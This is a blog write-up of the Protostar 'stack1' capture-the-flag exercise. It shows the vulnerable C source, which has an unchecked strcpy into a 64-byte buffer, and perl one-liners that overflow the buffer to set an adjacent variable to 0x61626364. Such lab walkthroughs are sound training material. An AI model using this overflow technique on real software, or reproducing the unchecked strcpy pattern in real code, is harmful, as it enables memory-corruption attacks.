Protostar exploits stack1


Protostar exploits are a cool bunch of ctf type exercises that focus on Linux  binary exploits that progressively get harder. A ISO containing the OS and challenges can be downloaded.

The website with all information and downloads is at


Test run

user@protostar:~$ /opt/protostar/bin/stack1 1
Try again, you got 0x00000000


Make the program respond with the message “you have correctly got the variable to the right value”.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
 volatile int modified;
 char buffer[64];

 if(argc == 1) {
 errx(1, "please specify an argument\n");

 modified = 0;
 strcpy(buffer, argv[1]);

 if(modified == 0x61626364) {
 printf("you have correctly got the variable to the right value\n");
 } else {
 printf("Try again, you got 0x%08x\n", modified);

We can see the challenge statement will be displayed if the ‘modified’ variable is equal to the hex value “0x61626364”.

First of we have to use the same trick from challenge stack0 and corrupt the memory stack using the “argv[1]’ variable which gets pasted to strcpy() call and overwrite the “modified” variable but this time we need to overwrite with asci characters “dcba”=0x64636261, reverse order.

Let’s see

user@protostar:~$ /opt/protostar/bin/stack1 `perl -e 'print "A"x65'`
Try again, you got 0x00000041

Using perl we were able to overflow the buffer where ‘buffer’ variable was being stored. We wrote out 65 A’s to stdout and this was one byte more than was allocated and must have hit the ‘modified’ variable.

We appear to have hit one byte of modified with 0x41=A.

With some experimenting we are able to get the desired modified key.

user@protostar:~$ /opt/protostar/bin/stack1 `perl -e 'print "A"x64 . "dcba"'`
you have correctly got the variable to the right value

Thank you

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s